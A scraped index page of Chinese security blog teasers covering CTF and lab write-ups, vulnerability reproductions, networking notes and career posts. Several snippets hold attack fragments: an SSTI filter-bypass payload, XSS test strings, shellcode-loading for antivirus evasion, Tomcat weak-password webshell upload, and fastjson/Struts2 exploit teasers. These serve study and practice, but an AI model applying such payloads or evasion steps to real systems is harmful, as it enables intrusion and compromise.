今天打bugku的在线awd 打的时候看到了 public function run() {$_m isset($_GET[m]) ? $_GET[m] : index;method_exists($this, $_m) ? eval($this->.$_m.();) : $this->index();}算个路由函数，通过m参数来指定model 当时就觉得eval这里有问题，…

2023年深圳等保测评机构名称以及地址汇总

你知道深圳等保测评机构有哪些？知道在哪里吗？今天我们小编就给大家汇总一下。 2023年深圳等保测评机构名称以及地址汇总序号：1 名称：深圳市信息安全管理中心地址：深圳市福田区莲花街道福中路城市数字资源中心序…

免杀对抗-内存加载-shellcode转换-UUID+MAC+IPV4

内存加载-UUID地址-ShellCode转换介绍：通用唯一识别码(UUID),是用于计算机体系中以识别信息数目的一个128位标识符，根据标准方法生成，不依赖中央机构的注册和分配，UUID具有唯一性。演示语言：c 1.使用以下代码将c语言…

为什么说网络安全是IT行业最后的红利？是风口行业？

前言 “没有网络安全就没有国家安全”。当前，网络安全已被提升到国家战略的高度，成为影响国家安全、社会稳定至关重要的因素之一。网络安全行业特点 1、就业薪资非常高，涨薪快 2021年猎聘网发布网络安全行业就业薪资行业最高人均33.77万…

常见逻辑漏洞总结

Web安全测试中常见逻辑漏洞解析（实战篇） 简要： 越权漏洞是比较常见的漏洞类型，越权漏洞可以理解为，一个正常的用户A通常只能够对自己的一些信息进行增删改查，但是由于程序员的一时疏忽，对信息…

安全渗透测试基础之漏洞扫描工具之Nessus使用介绍

前置条件：Nessus工具使用前要确保工具是服务状态 systemctl start nessusd.service 启动nessus服务 systemctl status nessusd.service 查看nessus服务状态 1.配置扫描模板 2.新增高级扫描 2.1 设置日程表： 2.2设置邮件收件人(可选)： 2.3主机发现： 2.

【超详细】Wireshark教程----Wireshark 分析ICMP报文数据试验

一，试验环境搭建 1-1 试验环境示例图 1-2 环境准备两台kali主机（虚拟机） kali2022 192.168.220.129/24 kali2022 192.168.220.3/27 1-2-1 网关配置： 编辑-------- 虚拟网路编辑器更改设置进来以后 ，先选择N…

RSA非对称加密算法原理

RSA非对称加密算法是一种广泛使用的公钥加密技术，它的名字来源于其三位发明者的名字首字母：Ron Rivest，Adi Shamir，和 Leonard Adleman。RSA算法基于一个非常困难的数学问题——大数因子分解问题。以下是RSA算法的原理及其加密解…

【VulnHub系列】MyFileServer

因为是从PDF转换过来偶尔可能会出现内容缺少，可以看原版PDF：有道云笔记实验环境 Kali：192.168.10.102 MyFileServer：192.168.10.106 实验过程通过arp-scan来发现靶机的IP地址 sudo arp-scan --interface eth0 192.168.10.1…

web安全自学笔记

Web 安全方面的基本知识是有很必要的，未必就要深入理解。本文主要介绍常见的网络攻击类型，不作深入探讨。正文网络攻击的形式种类繁多，从简单的网站敏感文件扫描、弱口令暴力破解，到 SQL 注入，再到复杂的网络劫持等…

一个扫描常见敏感目录的burpsuite插件

SpringScan 介绍一个扫描Spring的常见敏感目录的burp suite插件直接添加插件即可，自动扫描详细功能页面 1、被动扫描页面 2、主动扫描页面 3-配置页面工具下载地址一个扫描常见敏感目录的burpsuite插件https://mp.weixin.qq.com/s/6ZlfsVVtvVEB6DZVdtUKoQ

利用SQL注入漏洞登录后台

所谓SQL注入，就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串，最终达到欺骗服务器执行恶意的SQL命令，比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的，这类表单特别容易受到SQ…

一个拦截XSSI 识别Web蜜罐的插件

说明这是一个带有学习和研究性质的Chrome扩展程序。功能截获页面中发起的XSSI请求，通过域名、URI、Query黑名单特征识别阻断可疑的XSSI（Jsonp Callback、XSS等） 对可疑URL进行深度检测，通过发送请求获取body内容&#xff0c…

蓝海卓越计费管理系统 download.php 任意文件读取漏洞

0x01、漏洞描述蓝海卓越计费管理系统 download.php文件存在任意文件读取漏洞，攻击者通过 …/ 遍历目录可以读取服务器上的敏感文件 0x02、漏洞影响蓝海卓越计费管理系统 0x03、fofa title“蓝海卓越计费管理系统” 0x04、漏洞复现登录页面如下&#xff1a…

cookie、session、token学习笔记

一.cookie 1.什么是cookie？ Cookie用于存储web页面的用户信息。 Cookie是一些数据，存储于你电脑的文本文件中。当web服务器向浏览器发送web页面时，在连接关闭后，服务端不会记录用户的信息。而Cookie的作用就是用于解决“如…

畅捷通T+ 反序列化漏洞复现（QVD-2023-13615）

0x01 产品简介畅捷通 T 是一款基于互联网的新型企业管理软件，功能模块包括：财务管理、采购管理、库存管理等。主要针对中小型工贸和商贸企业的财务业务一体化应用，融入了社交化、移动化、物联网、电子商务、互联网信息订阅等元素。 0x02 漏…

八、Kali Linux 2 Armitage

Armitage 其实命令行的操作方式之所以让很多人感到困难，主要是由于大多数人从小就习惯了Windows操作系统以及这个系统中的图形化操作软件。因此如果Metasploit有一个图形化的操作界面，那么学习起来将会是一个十分愉快的过程。 Armitage就是一款使用Jav…

ISS之WEB服务器

文章目录ISS之WEB服务器一、WEB服务器1、部署WEB服务器新建网站IP冲突解决方法一：IP冲突解决方法二：IP冲突解决方法三：附1、创建一个简单网站新建网页编辑网页附2、新建虚拟网卡（新建IP）附3、通过域名访问网站2、网站类…

【服务器】-用户与组管理

文章目录用户与组管理一、服务器系统版本介绍二、用户管理1、用户概述2、内置账户3、配置文件4、用户管理命令三、组管理1、组概述2、内置组3、组管理命令四、服务管理用户与组管理一、服务器系统版本介绍 Windows服务器系统： win2000 win2003 win2008 win2012L…

命令注入总结

Day8——操作系统基础windows

文章目录操作系统基础操作系统的定义什么是windows 操作系统基础操作系统的定义什么是windows

2023年上海市浦东新区网络安全管理员决赛理论题样题

目录一、判断题二、单选题三、多选题一、判断题 1.等保1.0至等保2.0从信息系统拓展为网络和信息系统。正确（1）保护对象改变等保1.0保护的对象是信息系统，等保2.0增加为网络和信息系统，增加了云计算、大数据、工业控制系统、物联网、移动物联技术、网络基础…

网络安全的重要性

网络安全是指网络系统的硬件、软件及其系统中的数据受到保护，不受偶然的或者恶意的原因而遭到破坏、更改、泄露，系统连续可靠正常地运行，网络服务不中断。网络安全从其本质上来讲就是网络上的信息安全。从广义来说，凡是涉及到…

网络安全（黑客）自学笔记

建议一：黑客七个等级黑客，对很多人来说充满诱惑力。很多人可以发现这门领域如同任何一门领域，越深入越敬畏，知识如海洋，黑客也存在一些等级，参考知道创宇 CEO ic（世界顶级黑客团队 0x557 成员…

通过SQL操作Excel(基于Python + Antlr实现)

ANTLR工具本身是用JAVA语言编写的，想要在Python环境中使用，需要进行简单的环境准备，参考：Python中使用Antlr4的环境准备实现功能创建数据库：通过create database语句创建一个excel文件创建表：通过create table语句新增一个sheet删除表：通过drop table语句删除指定的s…

7月1日正式施行 ——《商用密码管理条例》解读

《商用密码管理条例》解读 1. 什么是密码2. 《商用密码管理条例》解读3. 《商用密码管理条例》的重要意义 2023年7月1日起，经国务院修订通过的《商用密码管理条例》将正式生效。 1. 什么是密码 （1）密码的概念现实生活中提到“密码”一词&…

利用python的requests模块获取HTTP信息

利用python的requests模块获取HTTP信息 import requests #导入requests模块 from colorama import Fore, Back, Style #关键词高亮显示出来requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) #当访问网站的证书不安…

BUUCTF Reverse题不一样的flag

BUUCTF Reverse题不一样的flag 先用exeinfo判断一下，为32位，用IDA32打开，找到main，反编译： int __cdecl main(int argc, const char **argv, const char **envp) {char v3; // [esp17h] [ebp-35h]int v4; // [esp30…

BUUCTF Reverse(xor)

BUUCTF Reverse(xor) 首先用exeinfoPE判断一下，得到是64位的，没有加壳。接下来，用IDA64打开，找到main函数，F5反编译，查看伪代码： int __cdecl main(int argc, const char **argv, const char …

XCTF 攻防世界 Reverse 新手题(re1)

XCTF 攻防世界 Reverse 新手题(re1) re1 首先，可以看到附件是一个exe程序，可以先执行一下看看（一般CTF的题目是不会有什么病毒的，如果有杀毒软件显示有木马的话，允许执行就可以了，因为目前大部分exe文件的…

渗透测试和CTF Web中常用的浏览器插件

渗透测试和CTF Web中常用的浏览器插件以常用的chrome浏览器为例 Developer Tools 在遇到JS相关的题目的时候，可以直接在Console面板上运行JS代码 XSS题目中，可以在Element面板中很方便的定位到元素的位置 Hasher 可以快速的计算常见哈希算法&#…

逻辑漏洞yu越权

越权与逻辑漏洞越权原理如果用A用户的权限取操作B用户的数据，A的权限小于B的权限，如果能够成功操作，则称之为越权操作。越权漏洞形成的原因是后台使用了不合理的权限校验规则导致的一般越权漏洞容易出现在权限页面(需要登陆的页面)&a…

MG信息泄露

敏感信息泄露漏洞描述由于管理员或者技术人员等各种原因导致敏感信息泄露。许多web应用程序和api都无法正确保护敏感数据，攻击者可以通过窃取或修改未改加密的数据来实施信用卡诈骗、身份盗窃或其他犯罪行为。未加密的敏感数据容易受到破坏，因此&…

常见信息安全威胁与防范以及安全防御未来的发展趋势

目录案例：震网病毒信息安全攻击事件的演变安全威胁分类网络安全威胁DDos攻击DDos的防御应用安全威胁蠕虫病毒漏洞钓鱼攻击恶意代码应用安全威胁的防御手段数据在传输与终端安全威胁中间人攻击信息安全防范安全防范的方法安全意识社会工程学安全防御未来的发展趋势趋…

网站安全维护：守护您的数字领土

在这个数字时代，网站已成为企业和个人展示自己的重要平台。然而，随着互联网的高速发展，网站安全问题也日益严峻。黑客和入侵软件等威胁不断涌现，因此，保护网站免受这些威胁的影响变得至关重要。本文将探讨网站安全维护…

CISSP，你值得拥有（我的学习之路）

（只分享三点：怎么学、怎么练、怎么考。） 我为啥去考CISSP 我是个在信安行业摸爬滚打将近20年的老油条，知道CISSP这个认证是很早前的事情了，但一直以来都觉得它有点难，加上人又懒得要命，也就始…

crypto：RSA

题目利用代码跑一下解码 import gmpy2 e 17 p 473398607161 q 4511491 d gmpy2.invert(e,(p-1)*(q-1)) print(d)总结 RSA（Rivest-Shamir-Adleman）是一种非对称加密算法，常用于数据加密和数字签名。它基于两个大素数的乘积难以分解的数…

网络安全（黑客技术）自学内容

前言一、什么是网络安全网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域，都有攻与防…

【CTFHUB】SSRF原理之简单运用（一）

一、漏洞原理 SSRF 服务端请求伪造原理：在某些网站中提供了从其他服务器获取数据的功能，攻击者能通过构造恶意的URL参数，恶意利用后可作为代理攻击远程或本地的服务器。二、SSRF的利用 1.对目标外网、内网进行端口扫描。 2.攻击内网或本…

网络安全——自学(黑客)方法

如果你想自学网络安全，首先你必须了解什么是网络安全！，什么是黑客！！ 1.无论网络、Web、移动、桌面、云等哪个领域，都有攻与防两面性，例如 Web 安全技术，既有 Web 渗透2.也有 Web 防…

（自学）黑客————网络安全技术

如果你想自学网络安全，首先你必须了解什么是网络安全！，什么是黑客！！ 1.无论网络、Web、移动、桌面、云等哪个领域，都有攻与防两面性，例如 Web 安全技术，既有 Web 渗透2.也有 Web 防…

【MQTT】mosquitto库中SSL/TLS相关API接口

文章目录 1.相关API1.1 mosquitto_tls_set1.2 mosquitto_tls_insecure_set1.3 mosquitto_tls_opts_set1.4 mosquitto_tls_insecure_set1.5 mosquitto_tls_set_context1.6 mosquitto_tls_psk_set 2.示例代码 Mosquitto 是一个流行的 MQTT 消息代理（broker&#xff09…

从某达OA到Yii2框架的cookie反序列化漏洞研究

序言近期网上流传的某达OA存在PHP反序列化漏洞，导致命令执行。因为该漏洞底层是Yii2框架的漏洞，所以搭建好了Yii2框架环境，在Yii2框架的环境下来进行模拟研究，希望能达到举一反三和类比分析学习的目的。该cookie处反序列化漏洞属…

网络安全的发展方向是什么？网络安全学什么内容

前言不少小伙伴开始学习网络安全技术，但却不知道学习网络安全能找什么工作？网络安全是现下较为火热的职业岗位，吸引了许多企业和个人对网络安全技术的青睐。学习网络安全的人越来越多，网络安全也有很多发展方向。那么如何选择网…

Configuration of phpstudy and sqli-labs

Go download the app： 小皮面板(phpstudy) - 让天下没有难配的服务器环境！ (xp.cn) Have done. Then enter the program. Enable both functions： Apache and MySQL. Open the website： Next, Lets make the sqli-liab. GitHub…

记一个src中危-图像大小与请求参数可修改

本文由掌控安全学院-杳若投稿漏洞描述服务器生成了一个具有客户端指定尺寸的图像，如果未实施任何限制，则可能导致拒绝服务攻击。漏洞危害攻击者不需要在此类攻击中投入资源，但服务器可能会分配所需的像素缓冲区（导致内存不…

常见网络设备

目录园区网安全部署场景交换机交换机的转发行为交换机的工作过程路由器防火墙交换机路由器与防火墙的对比防火墙的发展历史防火墙区域园区网安全部署场景设备作用路由器跨网段通信设备。交换机同网段或跨网段通信设备。AntiDDoSDDoS防御系统，通常旁挂部署于网络出口…

常见服务器种类与威胁

目录前言服务器服务器的特点服务器和个人电脑比较服务器分类机架式服务器塔式服务器刀片式服务器机柜式服务器服务器软件服务器安全威胁恶意程序黑客暴力破解SQL注入攻击DDoS攻击常见安全威胁防御方法漏洞与补丁漏洞的分类补丁前言从广义上讲，服务器是指网络中能够…

两个AP之间的关系：我们的爱情到这里刚刚好

我常常形容AC和AP之间是母子情，那么两个AP之间是什么情谊呢？有人会说是兄弟情？毕竟都有同一个母亲AC，那..可不可以是爱情呢？毕竟两个AP之间想要达到最好的效果就需要像爱情一样若即若离，如果靠得太近就会被…

【腾讯云网站备案】

1、网站备案，不备案的话域名可能被屏蔽，网站访问域名出不来腾讯云备案一步步来就可注意点主体信息的通信地址得最详细 ，备注通信地址已为最详细地址都和证件住址保持一个省，视频核身ip也是保持一个省，白色背…

这可是全网eNSP安装最完整，最详细的图解，没有之一（安装步骤）

eNSP安装大纲 eNSP安装详细图解篇幅较长，会分三篇更完。急需安装的朋友可以在文末获取图解文档和所需软件工具。三个插件和eNSP安装步骤安装ensp之前必须先安装以下三个插件： VirtualBoX安装双击安装包，运行安装程序，直接点击…

华为高工整理多区域OSPF项目模拟实验文档，附配置文件

俗语：事实胜于雄辩。为了应对网络规模日益增大的问题，大多科技公司决定使用ospf的多区域模式来规划网络。实验目标： 1、理解OSPF工作原理 2、掌握OSPF多区域的规划和配置 3、掌握OSPF各项性能优化技术实验拓扑和需求： 配置…

网络工程师常用高级技术，路由策略全面详解

我们之前学习过ACL（访问控制列表），用来做流量过滤，其实这其中的ACL技术和我们今天提到的路由策略倒是有一点联系的，但是对于网络工程师来说，路由策略的部署更为复杂，所应用的方面也存在于各种协…

ctfshow-web368(SSTI)

用上两题的方法，有东西被过滤了两个大括号被过滤了也不知道是什么意思 ?name{% set podict(poa,pa)|join%} {% set a(()|select|string|list)|attr(po)(24)%} {% set ini(a,a,dict(inita)|join,a,a)|join()%} {% set glo(a,a,dict(globalsa)|join,a,a)|join()%…

Tomcat-pass-getshell 弱口令 vulfocus夺旗

漏洞原因：后台登录使用弱口令，部署war包geshell 测试环境：Apache Tomcat/8.0.43 1、启动CVE-2017-12615目标靶场，并访问默认账目密码：tomcat/tomcat 2、找到上传点进行上传war包利用冰蝎的shell.jsp去生成war包 ja…

非对称加密与RSA算法

非对称加密与RSA算法文章目录非对称加密与RSA算法RSA加密算法算法流程举例说明计算方法拓展欧几里得算法求乘法逆元快速幂费马小定理求乘法逆元快速幂求memodnm^e\ mod\ nme mod n公开密码体系的产生原因1.对称密码体系中密钥的传递存在风险,虽然信息是加密传送的,但是密钥是明…

哔哩哔哩2021年1024程序员节算发与安全答题——解析答案

哔哩哔哩2021年1024程序员节算发与安全答题最后图片仅供参考

2021全国职业技能大赛-网络安全赛题解析总结①（超详细）

2021全国职业技能大赛-网络安全赛题解析总结（1）模块A 基础设施设置与安全加固有问题可以私聊博主模块A 基础设施设置与安全加固一、项目和任务描述： 假定你是某企业的网络安全工程师，对于企业的服务器系统，根据任务要…

wirehark数据分析与取证dump.pcap

什么是wireshark？ wiresharekdump.pcap数据包数据包下载请私信博主wiresharek Wireshark（前称Ethereal）是一个网络封包分析软件。网络封包分析软件的功能是检索取网络封包，并同时显示出最详细的网络封包数据。Wireshark使用WinPCAP作为接口，直接与网卡进行数据报文交换。…

Metasploit渗透测试（双脉冲星）

MS17-010(EternalBlue) 靶机：win7:service Pack1 172.16.5.201 靶机下载攻击机：kali 172.16.5.158 而且要保证两台机器之间可以ping通因为kali里面没有这个rb源代码所以我们要把这个模块导入进去我们先要smb模块下载到这里面 #cd /usr/share/m…

wirehark数据分析与取证attack.pcap

什么是wireshark？wiresharekattack.pcap数据包数据包下载请私信博主wiresharek Wireshark（前称Ethereal）是一个网络封包分析软件。网络封包分析软件的功能是检索取网络封包，并同时显示出最详细的网络封包数据。Wireshark使用Win…

xss详解（一）

文章目录XSS详解（一）一、概述二、XSS的分类2.1反射型XSS2.2存储型XSS2.3DOM型XSS三、常见XSS攻击向量四、xss测试流程图XSS详解（一） 一、概述 XSS(Cross Site Scripting)缩写为CSS，因易与层叠样式表CSS混淆&#xff…

【机器学习】特征工程 - 字典特征提取

「作者主页」：士别三日wyx 「作者简介」：CSDN top100、阿里云博客专家、华为云享专家、网络安全领域优质创作者「推荐专栏」：对网络安全感兴趣的小伙伴可以关注专栏《网络安全入门到精通》字典特征提取一、特征提取API一、提取数字特征二、…

ctfshow-web361(SSTI)

看到Hello，猜测输入的参数是name ?name{{[].__class__.__base__.__subclasses__()}} 然后应该是要写脚本跑程序找需要的函数（用的别人的，现在还不会写python脚本） 这里利用os._wrap_close类 import requests from tqdm import …

赶紧收藏起来，一文详解MPLS基础和工作原理

MPLS是一种在IP骨干网上利用标签来指导数据报文高速转发的协议，相较于传统的IP路由方式，MPLS提供了一种类似于交换机转发的新的网络交换方式，它将IP地址映射为简短且长度固定、只具有本地意义的标签，以标签交换替代IP查表&#xf…

XSS(DOM)

low <script>alert(xss)</script> medium <script>alert(xss)</script> 输入这串代码页面没有变化，用其他的字母看看用其他的是可以的猜测是有东西被过滤了，是<script> 先查看一下数据包如果用不加标签的代码&…

buuctf-Nmap

输入127.0.0.1出现界面，再根据题目的nmap知道是命令执行输入127.0.0.1 | ls |被转义了，查一下可以用什么代替分号也被转义了 %0a没被转义，但是也没用（我之前也觉得没有用，就是尝试一下） 那就很难用命令…

常见的网络安全术语有那些？

1、黑帽为非法目的进行黑客攻击的人，通常是为了经济利益。他们进入安全网络以销毁，赎回，修改或窃取数据，或使网络无法用于授权用户。这个名字来源于这样一个事实：老式的黑白西部电影中的恶棍很容易被电影观众识别&am…

[ vulhub漏洞复现篇 ] vulhub 漏洞集合 - 表格版本（含漏洞复现文章连接）

🍬 博主介绍 👨‍🎓 博主介绍：大家好，我是 [_PowerShell](https://blog.csdn.net/qq_51577576) ，很高兴认识大家~ ✨主攻领域：【渗透领域】【数据通信】【通讯安全】【web安全】【面试分析】 🎉点赞➕评论➕收藏 == 养成习惯（一键三连）😋 🎉欢迎关注💗…

Mark loves cat

扫描目录（但是我用御剑扫不出来） ，然后用.git下载文件 <?phpinclude flag.php;$yds "dog"; $is "cat"; $handsome yds;foreach($_POST as $x > $y){　　　　//很明显的有变量覆写漏洞 $$x $y ; }foreach(…

[ 渗透入门篇 ] 渗透行业必备术语大集合(二)

🍬 博主介绍 👨‍🎓 博主介绍：大家好，我是 _PowerShell ，很高兴认识大家~✨主攻领域：【渗透领域】【数据通信】【通讯安全】【web安全】【面试分析】🎉点赞➕评论➕收藏 == 养成习惯（一键三连）😋🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末…

黑客是什么？想成为黑客需要学习什么？

什么是黑客在《黑客辞典》里有不少关于“黑客”的定义, 大多和“精于技术”或“乐于解决问题并超越极限”之类的形容相关。然而，若你想知道如何成为一名黑客，只要牢记两点即可。这是一个社区和一种共享文化，可追溯到那群数十年前使…

NCTF2021 Misc的一点点wp

在线等一个bot的wp Misc SignIn 跳转链接到了https://nctf.h4ck.fun/challenges/NCTF%7BWelcome_to_NCTF_2021!%7D 所以得到flag NCTF{Welcome_to_NCTF_2021!}Hello File Format 看一下这个bin文件大小为6220800 发现这个大小正好是1920*1080*3 直接联想到了画图咯 fr…

网工行业里的多面手，数据通信工程师2022年最新系统学习路线整理

有网络的地方就需要数通网络工程师。什么是数据通信工程师？ 数据通信工程师是从事电信网络的维护、参与和指导远端节点设备的安装调试、负责编制相关技术方案和制订维护规范的技术工程师。数据通信行业前景如何？ 随着互联网时代的到来和国家政策的推…

SQL注入（一）之原理与检测

一 SQL注入攻击原理 01 注射式攻击的原理注入产生的原因是接受相关参数未经处理直接带入数据库查询操作;注入攻击属于服务端攻击，他与操作系统、数据库类型、脚本语言类型无关总之一句话: 注入产生的原因是接受相关参数未经处理直接带入数据库查询操作。02 sql注入…

NAT如何配置地址转换

第一步：ACL规则执行命令system-view，进入系统视图。执行命令acl number 2000/3000 使用编号创建一个ACL，并进入ACL视图。根据实际情况配置基本ACL规则或者高级ACL规则，基本ACL 2000~2999 高级ACL3000~3999第二步：配置…

win10下web漏洞扫描工具：AWVS安装教程

01 AWVS安装 windows上安装其实很简单，以安装AWVS12版本为例子，具体步骤如下： 01 双击exe安装； 02 点击“Next"； 03 选择我同意； 04 设置用户名和密码； 这里用户名是以邮箱为准的&#…

毕业从事弱电3个月，我为什么会选择转行网络工程师

问征夫以前路，恨晨光之熹微。——陶渊明我刚毕业的时候，去的是一个弱电的公司做相关的技术支持工作。为什么去弱电公司工作呢？因为听老师说，做系统集成对提升技术是非常有帮助的。而这个弱电公司呢？确实是一个系统集成…

黑客都是土豪吗？真实情况是什么？

黑客的利益链条真的这么大这么好么,连最外围的都可以靠信息不对称赚普通人大学毕业上班族想都不敢想的金钱数目,黑客们是不是基本都是土豪网络技术可以称为黑客程度的技术是不是真的很吃香？如果大部分大学生的智力资源都用在学习网络技术，会不会出现僧…

【每日一记】OSPF区域划分详讲、划分区域的优点好处

个人名片： 🐼作者简介：一名大二在校生，喜欢编程🎋 🐻‍❄️个人主页🥇：小新爱学习. 🐼个人WeChat：hmmwx53 🕊️系列专栏：&#x1f5bc…

一款新的webshell管理工具

Alien 项目简介语言 C# .NET Framework V4.8 功能 File Manager （可显示图片， 可SearchFile） 虚拟终端数据库注册表监控截图系统信息项目描述一句话木马一句话木马是在渗透测试中用来控制服务器的工具强大之处在于木…

kali安装dvwa

引言因为工作原因，正在参加安全众测，我又是初学者，自然就绕不开dvwa。我就想在kali上面配置dvwa，不想再windows里面配，毕竟这样显得自己更专业。 dvwa是什么？DVWA全称为Damn Vulnerable Web Application…

金x软件有限公司安全测试岗位面试

目录一、自我介绍二、你是网络空间安全专业的，那你介绍下网络空间安全这块主要学习的东西？ 三、本科专业是网络工程，在嘉兴海视嘉安智城科技有限公司实习过，你能说下干的工作吗？（没想到问的是本科实习…

苹果修复了旧款iPhone上的iOS内核零日漏洞

导语近日，苹果发布了针对旧款iPhone和iPad的安全更新，回溯了一周前发布的补丁，解决了两个被攻击利用的零日漏洞。这些漏洞可能导致攻击者在受影响的设备上提升权限或执行任意代码。本文将介绍这些漏洞的修复情况以及苹果在修复漏洞方面的持续…

网络工程师知识点3

41、各个路由协议，在华为设备中的优先级？ 直连路由 0 OSPF 10 静态 60 42、OSPF：开放式最短路径优先路由协议，使用SPF算法发现和计算路由 OSPF的优点： 1、收敛速度快，无路由自环，适用于大型网络…

代理和多级代理

文章目录代理使用场景代理过程实验演示多级代理代理使用场景 1、拿下远程 web 服务器 2、webshell 链接不稳定，需要使用稳定的木马程序 3、远程服务器无法直接链接攻击者电脑 4、需要借助公网vps转发来自失陷服务器的木马流量 5、借助frp服务端(vps)和客户端(内网…

关于信息安全软考的记录6

1、入侵检测相关概念及入侵检测模型入侵：违背访问目标的安全策略的行为判断入侵的依据是：对目标的操作是否超出了目标的安全策略范围入侵检测：通过收集操作系统、系统程序、应用程序、网络包等信息，发现系统中违背安全策略…

CVE-2020-1938 Tomcat远程文件包含漏洞

漏洞简介 CVE-2020-1938是由长亭科技安全研究员发现的存在于 Tomcat 中的安全漏洞，由于 Tomcat AJP 协议设计上存在缺陷，攻击者通过 Tomcat AJP Connector 可以读取或包含 Tomcat 上所有 webapp 目录下的任意文件，例如可以读取 webapp 配置文…

咕咕送书第三期 | 在网络安全(黑客)时代数据安全流通的未来趋势？

🎬 鸽芷咕：个人主页 🔥 个人专栏:《粉丝福利》《C语言进阶篇》 ⛺️生活的理想，就是为了理想的生活! 文章目录 📋 前言数据安全流通的未来趋势？01 数据价值与产业崛起02 多数据技术融合创新发展03数字经济…

Pikachu靶场——暴力破解

文章目录 1. 暴力破解1.1 基于表单的暴力破解1.2 验证码绕过(on server)1.3 验证码绕过(on client)1.4 token防爆破?1.5 漏洞防御 1. 暴力破解暴力破解漏洞是指攻击者通过尝试各种组合的用户名和密码，以暴力方式进入系统或应用程序的方法。它利用了系统或应用程序…

渗透测试--Struts2框架

前言 Struts2是apache项目下的一个web 框架，普遍应用于阿里巴巴、京东等互联网、政府、企业门户网站。在我国strust2被广泛使用与各种战略性资产，Struts 2是Struts的下一代产品，但和一代相比架构有很大的区别，近年也是爆出了很多…

buuctf PWN warmup_csaw_2016

下载附件，IDA查看发现直接有显示flag函数 int sub_40060D() {return system("cat flag.txt"); }查看程序起始地址0x40060D ; Attributes: bp-based framesub_40060D proc near ; __unwind { push rbp mov rbp, rsp mov edi, offset comman…

王兰去（黑客）自学

前言： 想自学网络安全（黑客技术）首先你得了解什么是网络安全！什么是黑客网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“…

ToBeWritten之让响应团队参与并做好沟通

也许每个人出生的时候都以为这世界都是为他一个人而存在的，当他发现自己错的时候，他便开始长大少走了弯路，也就错过了风景，无论如何，感谢经历转移发布平台通知：将不再在CSDN博客发布新文章，敬…

ToBeWritten之记录狩猎过程

也许每个人出生的时候都以为这世界都是为他一个人而存在的，当他发现自己错的时候，他便开始长大少走了弯路，也就错过了风景，无论如何，感谢经历转移发布平台通知：将不再在CSDN博客发布新文章，敬…

时空智友企业流程化管控系统 session 漏洞复现

本文由掌控安全学院 - wax 投稿时空智友企业流程化管控系统 session 泄露 POC如下： 1 fofa 语法：title”时空智友企业信息管理” 访问目标首页如下：漏洞poc为 GET 方式访问 http://ip:port/manage/index.jsp 没看够~？欢迎关…

ToBeWritten之车联网安全中常见的TOP 10漏洞

也许每个人出生的时候都以为这世界都是为他一个人而存在的，当他发现自己错的时候，他便开始长大少走了弯路，也就错过了风景，无论如何，感谢经历转移发布平台通知：将不再在CSDN博客发布新文章，敬…

软考-密码学概述

本文为作者学习文章，按作者习惯写成，如有错误或需要追加内容请留言（不喜勿喷） 本文为追加文章，后期慢慢追加 by 2023年10月密码学基本概念密码学的主要目的是保持明文的秘密以防止攻击者获知，而密码分…

【自学笔记】网络安全——黑客技术

想自学网络安全（黑客技术）首先你得了解什么是网络安全！什么是黑客！！！ 网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队…

33 WEB漏洞-逻辑越权之水平垂直越权全解

目录前言水平，垂直越权，未授权访问Pikachu-本地水平垂直越权演示(漏洞成因)墨者水平-身份认证失效漏洞实战(漏洞成因)原理越权检测-Burpsuite插件Authz安装测试(插件使用)修复防御方案前言越权漏洞文章分享：https://www.cnblogs.com/zhen…

WebGoat 靶场 JWT tokens 四五七关通关教程

文章目录 webGoat靶场第四关修改投票数第五关第七关你购买书，让Tom用户付钱 webGoat靶场越权漏洞将webgoat-server-8.1.0.jar复制到kali虚拟机中 sudo java -jar webgoat-server-8.1.0.jar --server.port8888解释： java：这是用于执行…

做运维有前途吗？

不管男生女生，都不建议做运维！！就一个原因，性价比太低！需要会的东西多，没有一个统一的运维标准！你心目中的运维和别人心目中的运维，不是一个运维！也不建议做测试&#xf…

什么是 CSRF 、原理及其解决方式

什么是 CSRF ？ 跨站请求伪造（CSRF，Cross-site request forgery），也称为 XSRF，Sea Surf 或Session Riding，是一个攻击向量，它欺骗 Web 浏览器在登录用户的应用程序中执行不需要的动作…

DDoS防护技术解析：深入了解当前的DDoS防护技术和方法

前言网络安全已经成为每个企业和个人都不能忽视的问题。DDoS（分布式拒绝服务）攻击，作为一种常见的网络攻击方式，已经成为许多组织和个人的头痛之源。为了有效地应对这种攻击，各种DDoS防护技术和方法应运而生。如果…

网络安全就业形势怎么样?

泻药，以下都是我本人的肺腑之言，是答主深耕职场多年，转战数家公司总结周围朋友的从业经验才总结出来的行业真相，真心希望帮助到还没有步入职场的大家，尤其是24届的应届毕业生，多掌握些就业信息就能少走一些…

fastjson 1.2.24 反序列化导致任意命令执行漏洞

fastjson 1.2.24 反序列化导致任意命令执行漏洞文章目录 fastjson 1.2.24 反序列化导致任意命令执行漏洞1 在线漏洞解读:2 环境搭建2.1 启动：2.2 已启动：访问端口8090 3 影响版本：4 漏洞复现4.1 访问页面4.2 bp抓包，修改参数4.2.…

记录某SRC邀请处逻辑越权到组织管理员漏洞

本文由掌控安全学院 - xi4007 投稿 1.在挖掘某src漏洞时候信息收集的时候收集到某小程序该小程序的主要功能是帮助购买此服务的公司管理项目和销售员工的这里我们准备两个测试账号(A和B) 2.我们登录进去该小程序，按照正常步骤流程注册个公司账户对该小程序进行试…

前端已死，能转行干什么？

我前几天招人，前后端各招一个人。后端一天大概60多个投简历的。前端岗位发出去，我吃了个饭，1小时回来收到300多份简历…… 是一位HR回复的前端卷到什么程度的回答！ 下面我们来看两组官方纰漏的数据： 2023届全国高…

记录一次公益SRC的常见的cookie注入漏洞(适合初学者)

目录谷歌语法-信息收集 cookie注入实战演示信息收集 SQL注入判断查找字段数爆破表名输出结果总结 hack渗透视频教程，扫码免费领谷歌语法-信息收集 1.查找带有ID传参的网站（可以查找sql注入漏洞） inurl:asp idxx 2.查找网站后…

华为HCIP安全 VPN学习笔记密码学基础：基本框架介绍

